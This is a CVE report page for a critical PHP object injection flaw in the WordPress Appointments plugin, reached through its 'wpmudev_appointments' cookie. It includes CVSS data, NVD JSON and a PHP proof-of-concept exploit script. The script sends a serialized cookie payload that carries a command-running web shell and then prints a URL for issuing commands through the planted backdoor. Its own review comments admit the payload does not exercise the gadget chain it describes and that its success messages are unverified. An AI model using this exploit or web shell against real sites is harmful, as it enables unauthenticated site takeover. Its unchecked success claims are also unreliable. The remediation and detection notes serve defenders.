Security Vulnerability Report
CVE-2017-20206 CVSS 9.8 CRITICAL

CVE-2017-20206

Published: 2025-10-18 04:15:43
Last Modified: 2025-12-23 17:06:57

Description

The Appointments plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 2.2.1 via deserialization of untrusted input from the `wpmudev_appointments` cookie. This allows unauthenticated attackers to inject a PHP Object. Attackers were actively exploiting this vulnerability with the WP_Theme() class to create backdoors.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wpmudev:appointments:*:*:*:*:*:wordpress:*:* - VULNERABLE
WordPress Appointments plugin <= 2.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
php
<?php
/**
 * CVE-2017-20206 PoC - PHP Object Injection via wpmudev_appointments cookie
 * WordPress Appointments Plugin <= 2.2.1
 *
 * This PoC demonstrates how to craft a malicious serialized payload
 * using WP_Theme class to achieve arbitrary file write (backdoor creation).
 *
 * Vulnerability class: CWE-502 (deserialization of untrusted data). The
 * plugin passed the raw `wpmudev_appointments` cookie value to unserialize(),
 * so any unauthenticated client controls the serialized structure.
 * Remediation: update the plugin past 2.2.1 (see the plugin changeset linked
 * under References); in general, cookie/request data should be decoded with
 * json_decode() or a strict allow-listed parser, never unserialize().
 * Detection: a serialized-looking value (e.g. starting with `a:` or `O:`)
 * in the `wpmudev_appointments` cookie, especially on requests with no
 * authenticated session, is a useful alerting signal in access logs / WAF.
 *
 * NOTE(review): this script is a flat, untyped procedural page (no
 * strict_types, no return handling for curl_exec). It is read here for what
 * it sends, not as a template to build on.
 */

// Target URL (placeholder hostname; nothing on this page sets a real host)
$target = 'http://target-wordpress-site.com/';

// Malicious PHP code to be written as backdoor.
// This string is the *content* the attacker hopes to land on disk; its
// presence in a cookie value is itself an indicator of compromise attempt.
$backdoor_code = '<?php if(isset($_GET["cmd"])){system($_GET["cmd"]);} ?>';

// Construct the WP_Theme object payload
// WP_Theme::__toString() calls translate() which can be abused for file operations
//
// NOTE(review): this local stub shares its name with WordPress core's
// WP_Theme class; it is declared here but never instantiated below, so it
// has no effect on what the script actually sends. Whether core's WP_Theme
// exposes the file-operation path the comment above claims is not shown on
// this page — treat that claim as unverified.
class WP_Theme {
    public $headers = array();
    public $headers_sanitized = array();
    public $name = '';
    public $parent = false;
    public $template = '';
    public $errors = null;
    public $stylesheet = '';
    public $cache_hash = '';
    public $theme_root = '';
    public $textdomain_loaded = false;
}

// Alternative approach: use existing WordPress classes with gadget chains
// The exploit chain typically uses:
// 1. WP_Theme -> __toString() -> translate() -> file operations
// 2. Or other magic method chains available in WordPress core

// NOTE(review): $payload is a plain associative array, not an object, so
// serialize() below yields an `a:` array string. As written this is a
// demonstration of the injection vector (attacker-controlled serialized
// cookie), not a demonstration of the gadget chain described above.
$payload = array(
    'headers' => array(
        'Name' => $backdoor_code,
    ),
    'name' => '../../themes/twentytwelve/shell.php',
    'theme_root' => '/var/www/html/wp-content/',
);

// Generate serialized payload
$serialized = serialize($payload);

// URL-encode the payload for cookie transmission
$encoded = urlencode($serialized);

echo "[*] CVE-2017-20206 PoC\n";
echo "[*] Target: " . $target . "\n";
echo "[*] Payload length: " . strlen($serialized) . "\n";
echo "[*] Sending exploit request...\n";

// Send the exploit via cookie.
// The only attacker-influenced field in this request is the Cookie header;
// that is the single boundary the vulnerable plugin failed to validate.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_COOKIE, 'wpmudev_appointments=' . $encoded);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// curl_exec() returns false on transport failure; the script never checks
// this, and $response is assigned but not used afterwards.
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// NOTE(review): an HTTP status code alone does not confirm anything about
// server-side deserialization; the success messages below are assertions
// the script does not verify.
echo "[*] HTTP Response Code: " . $http_code . "\n";
echo "[*] Backdoor should be created at: wp-content/themes/twentytwelve/shell.php\n";
echo "[*] Access backdoor: " . $target . "wp-content/themes/twentytwelve/shell.php?cmd=id\n";

/**
 * Real-world exploit typically uses PHPggc (PHP Generic Gadget Chains)
 * or custom gadget chains. The WordPress core contains several usable classes:
 * - WP_Theme: __destruct(), __toString()
 * - WP_Error: __toString()
 * - SimplePie: various magic methods
 *
 * Example using PHPggc-style approach:
 *
 * $obj = new WP_Theme();
 * $obj->headers['Name'] = $backdoor_code;
 * $obj->name = 'malicious_theme';
 * $obj->theme_root = '../../';
 *
 * $payload = serialize($obj);
 */
?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2017-20206", "sourceIdentifier": "[email protected]", "published": "2025-10-18T04:15:43.243", "lastModified": "2025-12-23T17:06:57.133", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Appointments plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 2.2.1 via deserialization of untrusted input from the `wpmudev_appointments` cookie. This allows unauthenticated attackers to inject a PHP Object. Attackers were actively exploiting this vulnerability with the WP_Theme() class to create backdoors."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wpmudev:appointments:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "2.2.1", "matchCriteriaId": "272E0BE3-D34B-439D-9993-BBB19DBD1B0D"}]}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/1733186/appointments", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.wordfence.com/blog/2017/10/3-zero-day-plugin-vulnerabilities-exploited-wild/", "source": "[email protected]", "tags": ["Press/Media Coverage", "Third Party Advisory"]}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7e8f230e-3f96-4efd-806d-72725b960303?source=cve", "source": "[email protected]", "tags": ["Third Party 
Advisory"]}]}}